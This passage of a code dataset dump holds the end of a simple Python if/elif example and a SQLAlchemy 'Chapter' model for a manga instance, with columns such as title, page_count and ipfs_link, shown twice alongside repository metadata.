print("x is 2")
elif(x==3):
print("x is 3")
else:
print("value doesnot match")
| true
| true
|
f7054235a1553c55fbb86f3ddd8de322b7a8e454
| 1,157
|
py
|
Python
|
mangaloid_instance/storage/models/chapter.py
|
compscifag/instance
|
449217abcab48cf3bbbb99ed2be9fcfacf2fa92f
|
[
"MIT"
] | null | null | null |
mangaloid_instance/storage/models/chapter.py
|
compscifag/instance
|
449217abcab48cf3bbbb99ed2be9fcfacf2fa92f
|
[
"MIT"
] | null | null | null |
mangaloid_instance/storage/models/chapter.py
|
compscifag/instance
|
449217abcab48cf3bbbb99ed2be9fcfacf2fa92f
|
[
"MIT"
] | null | null | null |
from . import Base
from sqlalchemy import Column, Integer, Text, DateTime, ForeignKey
from datetime import datetime
class Chapter(Base):
__tablename__ = "chapters"
id = Column(Integer, primary_key=True, autoincrement=True)
manga_id = Column(Integer, ForeignKey("manga.id"))
chapter_no = Column(Integer)
chapter_postfix = Column(Text)
ordinal = Column(Integer)
page_count = Column(Integer)
title = Column(Text)
version = Column(Integer)
language_id = Column(Text)
group_id = Column(Integer)
date_added = Column(DateTime)
ipfs_link = Column(Text)
def to_dict(self):
return {
"id" : self.id,
"manga_id" : self.manga_id,
"chapter_no" : self.chapter_no,
"chapter_postfix" : self.chapter_postfix,
"ordinal" : self.ordinal,
"title" : self.title,
"page_count" : self.page_count,
"version" : self.version,
"language_id" : self.language_id,
"group_id" : self.group_id,
"date_added" : int(self.date_added.timestamp()),
"ipfs_link" : self.ipfs_link
}
| 33.057143
| 66
| 0.615385
|
from . import Base
from sqlalchemy import Column, Integer, Text, DateTime, ForeignKey
from datetime import datetime
class Chapter(Base):
__tablename__ = "chapters"
id = Column(Integer, primary_key=True, autoincrement=True)
manga_id = Column(Integer, ForeignKey("manga.id"))
chapter_no = Column(Integer)
chapter_postfix = Column(Text)
ordinal = Column(Integer)
page_count = Column(Integer)
title = Column(Text)
version = Column(Integer)
language_id = Column(Text)
group_id = Column(Integer)
date_added = Column(DateTime)
ipfs_link = Column(Text)
def to_dict(self):
return {
"id" : self.id,
"manga_id" : self.manga_id,
"chapter_no" : self.chapter_no,
"chapter_postfix" : self.chapter_postfix,
"ordinal" : self.ordinal,
"title" : self.title,
"page_count" : self.page_count,
"version" : self.version,
"language_id" : self.language_id,
"group_id" : self.group_id,
"date_added" : int(self.date_added.timestamp()),
"ipfs_link" : self.ipfs_link
}
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.